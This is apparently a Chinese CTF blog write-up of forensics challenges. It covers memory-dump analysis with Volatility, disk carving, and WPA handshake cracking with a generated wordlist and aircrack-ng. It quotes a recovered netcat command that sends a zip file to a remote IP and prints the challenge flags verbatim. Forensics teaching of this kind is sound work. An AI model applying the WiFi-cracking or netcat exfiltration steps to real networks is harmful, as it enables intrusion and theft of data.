电子取证

断电的PC

参考我以前写的博客:https://blog.ixuchao.cn/archives/31.html

步骤如下:

root@Archerx:/home/xiaosai# volatility -f RAM.vmem imageinfo
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (/home/xiaosai/RAM.vmem)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80003fed070L
          Number of Processors : 2
     Image Type (Service Pack) : 0
                KPCR for CPU 0 : 0xfffff80003feed00L
                KPCR for CPU 1 : 0xfffff880009ee000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2018-10-29 03:08:06 UTC+0000
     Image local date and time : 2018-10-29 11:08:06 +0800
root@Archerx:/home/xiaosai# volatility psscan -f RAM.vmem --profile=Win7SP1x64
Volatility Foundation Volatility Framework 2.6
Offset(P)          Name                PID   PPID PDB                Time created                   Time exited                   
------------------ ---------------- ------ ------ ------------------ ------------------------------ ------------------------------
0x000000007e6148b0 dwm.exe            1984    784 0x00000000138cc000 2018-10-29 03:06:02 UTC+0000                                 
0x000000007e629b30 explorer.exe       2012   1960 0x0000000013993000 2018-10-29 03:06:02 UTC+0000                                 
0x000000007e6bdb30 SearchProtocol      284    840 0x000000000e6b9000 2018-10-29 03:06:13 UTC+0000   2018-10-29 03:07:18 UTC+0000  
0x000000007e70d060 notepad.exe        2816   2012 0x0000000008a8b000 2018-10-29 03:07:47 UTC+0000                                 
0x000000007e716b30 wmpnetwk.exe       2900    468 0x0000000007d8e000 2018-10-29 03:07:52 UTC+0000                                 
0x000000007e7a7810 sppsvc.exe         2828    468 0x0000000008802000 2018-10-29 03:07:51 UTC+0000                                 
0x000000007e814b30 svchost.exe        1540    468 0x0000000018c91000 2018-10-29 03:05:51 UTC+0000                                 
0x000000007e92f060 svchost.exe        1576    468 0x0000000018c9b000 2018-10-29 03:05:51 UTC+0000                                 
0x000000007e9e83a0 taskhost.exe       1900    468 0x000000001457b000 2018-10-29 03:06:02 UTC+0000                                 
0x000000007ea11060 svchost.exe         660    468 0x0000000027e15000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007ea41b30 SearchIndexer.      840    468 0x00000000107a2000 2018-10-29 03:06:11 UTC+0000                                 
0x000000007ea51b30 svchost.exe         752    468 0x00000000217fd000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007ea6c200 svchost.exe         784    468 0x0000000021544000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007ea74b30 svchost.exe         812    468 0x0000000020b0c000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007eaa4060 audiodg.exe         896    752 0x0000000020b30000 2018-10-29 03:05:48 UTC+0000                                 
0x000000007ead0800 svchost.exe         972    468 0x000000001fe56000 2018-10-29 03:05:49 UTC+0000                                 
0x000000007eafa890 svchost.exe         332    468 0x000000001fd22000 2018-10-29 03:05:49 UTC+0000                                 
0x000000007eb60b30 spoolsv.exe         644    468 0x0000000012980000 2018-10-29 03:05:50 UTC+0000                                 
0x000000007eb6db30 svchost.exe        1072    468 0x000000001cf62000 2018-10-29 03:05:50 UTC+0000                                 
0x000000007eb791d0 svchost.exe        2860    468 0x00000000087c8000 2018-10-29 03:07:51 UTC+0000                                 
0x000000007ecfe060 csrss.exe           380    364 0x0000000023ce5000 2018-10-29 03:05:46 UTC+0000                                 
0x000000007ed0c530 csrss.exe           320    308 0x000000002446a000 2018-10-29 03:05:45 UTC+0000                                 
0x000000007ed64060 winlogon.exe        412    364 0x00000000236ab000 2018-10-29 03:05:46 UTC+0000                                 
0x000000007eda3b30 lsass.exe           476    372 0x0000000022ab1000 2018-10-29 03:05:47 UTC+0000                                 
0x000000007eda68c0 lsm.exe             488    372 0x0000000022d79000 2018-10-29 03:05:47 UTC+0000                                 
0x000000007edf6b30 svchost.exe         584    468 0x0000000021d9a000 2018-10-29 03:05:47 UTC+0000                                 
0x000000007f4d2b30 services.exe        468    372 0x00000000228cf000 2018-10-29 03:05:46 UTC+0000                                 
0x000000007f4de590 WmiPrvSE.exe       3028    584 0x000000007a893000 2018-10-29 03:07:54 UTC+0000                                 
0x000000007f4e2410 smss.exe            248      4 0x000000002a484000 2018-10-29 03:05:43 UTC+0000                                 
0x000000007f4fe060 svchost.exe        1852    468 0x000000000c234000 2018-10-29 03:06:28 UTC+0000                                 
0x000000007ff09b30 System                4      0 0x0000000000187000 2018-10-29 03:05:43 UTC+0000                                 
0x000000007ff12060 wininit.exe         372    308 0x0000000023db0000 2018-10-29 03:05:46 UTC+0000                                 
root@Archerx:/home/xiaosai# volatility psscan -f RAM.vmem --profile=Win7SP1x64 --dump-dir . -p 2816
Volatility Foundation Volatility Framework 2.6
Usage: Volatility - A memory forensics analysis platform.

volatility: error: no such option: --dump-dir
root@Archerx:/home/xiaosai# volatility memdump -p 2816 -f RAM.vmem --profile=Win7SP1x64 --dump-dir . 
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing notepad.exe [  2816] to 2816.dmp
root@Archerx:/home/xiaosai# strings 2816.dmp | grep SDUT
SDUT2018{yOyQ031XGpiHhCA2qUwi0W9FSih4sIeZ}

大雄

查看进程发现有 cmd.exe 和 nc.exe,把进程 dump 出来后直接 strings 就能找到 flag。

我感觉正常思路应该是查看cmd.exe执行的命令

从 cmdscan 的结果可以看到,用 nc 传输了 flag.zip 文件。

提取出 flag.zip 后发现有密码……目前密码还没找到……

步骤如下:

root@Archerx:/home/xiaosai# strings  3236.dmp | grep SDUT
)SDUT2018{FuHHI86qCC8q6pu1piNhhTxA0hmWZBxW}
root@Archerx:/home/xiaosai# volatility memdump -p 3608 -f vmem --profile=Win7SP1x64 --dump-dir .
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing nc.exe [  3608] to 3608.dmp
root@Archerx:/home/xiaosai# strings 3608.dmp | grep SDUT
)SDUT2018{FuHHI86qCC8q6pu1piNhhTxA0hmWZBxW}
root@Archerx:/home/xiaosai# volatility memdump -p 3872 -f vmem --profile=Win7SP1x64 --dump-dir .
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing nc.exe [  3872] to 3872.dmp
root@Archerx:/home/xiaosai# strings 3872.dmp | grep SDUT
)SDUT2018{FuHHI86qCC8q6pu1piNhhTxA0hmWZBxW}
root@Archerx:/home/xiaosai# volatility memdump -p 3708 -f vmem --profile=Win7SP1x64 --dump-dir .
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing cmd.exe [  3708] to 3708.dmp
root@Archerx:/home/xiaosai# strings 3708.dmp | grep SDUT
)SDUT2018{FuHHI86qCC8q6pu1piNhhTxA0hmWZBxW}
root@Archerx:/home/xiaosai# volatility cmdscan  -f vmem --profile=Win7SP1x64 
Volatility Foundation Volatility Framework 2.6
**************************************************
CommandProcess: conhost.exe Pid: 2308
CommandHistory: 0x379ca0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 3 LastAdded: 2 LastDisplayed: 2
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
Cmd #0 @ 0x31a350: nc 10.6.65.3 < C:\flag\flag.zipx
Cmd #1 @ 0x350eb0: nc 10.6.65.3 6666 < C:\flag\flag.zipx
Cmd #2 @ 0x350f10: nc 10.6.65.3 6666 < C:\flag\flag.zip
**************************************************
CommandProcess: conhost.exe Pid: 2308
CommandHistory: 0x37ecd0 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0xf4
**************************************************
CommandProcess: conhost.exe Pid: 2408
CommandHistory: 0x2ca9b0 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 3 LastAdded: 2 LastDisplayed: 2
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
Cmd #0 @ 0x2c9c00: ping -t 10.6.65.36
Cmd #1 @ 0x2c9c60: ping -t 10.6.65.4
Cmd #2 @ 0x2c9c90: ping -t 10.6.65.220
**************************************************
CommandProcess: conhost.exe Pid: 2408
CommandHistory: 0x2cab90 Application: PING.EXE Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x88
**************************************************
CommandProcess: conhost.exe Pid: 3540
CommandHistory: 0x1da9b0 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
**************************************************
CommandProcess: conhost.exe Pid: 3540
CommandHistory: 0x1dab90 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x54
Cmd #8 @ 0xffb46238: 
Cmd #9 @ 0x1b3340: 
md #23 @ 0x160158: 
Cmd #24 @ 0x1afca0: 
**************************************************
CommandProcess: conhost.exe Pid: 3476
CommandHistory: 0x10a9b0 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
**************************************************
CommandProcess: conhost.exe Pid: 3476
CommandHistory: 0x10af30 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x54
**************************************************
CommandProcess: conhost.exe Pid: 3916
CommandHistory: 0x41a9b0 Application: cmd.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x5c
**************************************************
CommandProcess: conhost.exe Pid: 3916
CommandHistory: 0x41ab90 Application: nc.exe Flags: Allocated
CommandCount: 0 LastAdded: -1 LastDisplayed: -1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x54
Cmd #8 @ 0xffb46238: ;
Cmd #9 @ 0x3f3340: ?
Cmd #23 @ 0x3a0158: A
Cmd #24 @ 0x3efca0: ;

提取出flag.zip文件:

root@Archerx:/home/xiaosai# volatility filescan  -f vmem --profile=Win7SP1x64 | grep flag.zip
Volatility Foundation Volatility Framework 2.6
0x000000007e70f9a0      2      0 RW-rw- \Device\HarddiskVolume2\flag\flag.zipx\Desktop\flag.zipx
0x000000007e87f8a0      2      2 R--rw- \Device\HarddiskVolume2\flag\flag.zip
0x000000007e92f9e0      2      0 -W-rwd \Device\HarddiskVolume2\flag\flag.zipn\AppData\Local\Temp\vmware-wangjian\VMwareDnD\873b898e\flag.zip
0x000000007e98dbb0      2      2 R--rw- \Device\HarddiskVolume2\flag\flag.zip
0x000000007e9bddd0      2      0 RW-rw- \Device\HarddiskVolume2\flag\flag.zipx
0x000000007f28b700      2      1 R--rw- \Device\HarddiskVolume2\flag\flag.zip
0x000000007fe97ae0      2      2 R--rw- \Device\HarddiskVolume2\flag\flag.zip
root@Archerx:/home/xiaosai# ls
2816.dmp  2.png  3236.dmp  3608.dmp  3708.dmp  3872.dmp  black.png  DEEP.zip  file  go1.8.3.linux-amd64.tar.gz  logo.png  output  RAM.vmem  timg.jpg  tp5getshell.py  vmem
root@Archerx:/home/xiaosai# binwalk 3236.dmp | grep zip
root@Archerx:/home/xiaosai# volatility  -f vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000007fe97ae0 -n --dump-dir=.
Volatility Foundation Volatility Framework 2.6
DataSectionObject 0x7fe97ae0   None   \Device\HarddiskVolume2\flag\flag.zip
SharedCacheMap 0x7fe97ae0   None   \Device\HarddiskVolume2\flag\flag.zip

损坏的图片

在线修复即可

kaka的HDD

Winhex 可以看到空闲分区有一个password

有两种做法:一是用 WinHex 进行文件恢复,得到一个 zip,用上面的密码直接解压即可得到 flag。

二是用 binwalk 分析出该磁盘文件中有一个 zip 文件,用 dd 提取出来后解压得到 flag。

恐怖袭击

Codefest 2018 Intercept 原题

题解请参照:https://www.anquanke.com/post/id/158680

偷窥的wifi

WiFi.pcap 里面含有握手包,先用 python 生成密码字典:

#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Archerx
# @time: 2018/12/13 06:50 PM

# Write the candidate list used by the aircrack-ng run below to dic.txt:
# the 10,000 strings 'seclab0000' .. 'seclab9999', one per line, in
# ascending order (same output as four nested digit loops).
with open('dic.txt', 'w') as f:
    for n in range(10000):
        f.write('seclab%04d\n' % n)

再用 aircrack-ng 破解 WiFi 密码:

root@Archerx:/home/xiaosai# aircrack-ng wifi.cap 
Opening wifi.cap
Read 10678 packets.



      [00:00:00] 1016/9999 keys tested (3016.84 k/s) 

      Time left: 2 seconds                                      10.16%

                          KEY FOUND! [ seclab1012 ]


      Master Key     : 7E F7 C2 F7 15 B8 98 A0 5B 03 22 D7 E5 33 F0 A8 
                       C3 84 B6 8B A6 94 17 6A 0E 12 6B CA 35 05 36 E5 

      Transient Key  : 72 98 AB 10 F2 4E 97 4B 89 83 12 25 79 02 0E EF 
                       63 6F 39 FB 4B 83 06 06 FF 7A 3E 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : 08 68 78 A4 75 59 F2 A7 F9 31 CD 7B 66 FB 45 A8 

使用 XOR.exe 解密 KEY.bin(密码即上面破解出的 WiFi 密码),得到 HTTP SSL 密钥数据。

https详解:https://www.jianshu.com/p/e96620cdc2cf

将密钥导入 Wireshark 解密 SSL 流量。

导出一个 flag.zip 压缩包,里面的 flag.txt 内容转换成 ASCII 即可得到 flag。

  • 写完题解整个人都不好了

已有 2 条评论

  1. zzp:

    最后那个我记得其实也是有类似的题,当时就不会做,用crunch生成密码字典更快,用aircrack-ng进行破解wifi密码

    2018-12-15 22:49 回复
    1. Archerx:

      恩,这种题确实做过不止一次两次

      2018-12-19 22:34 回复
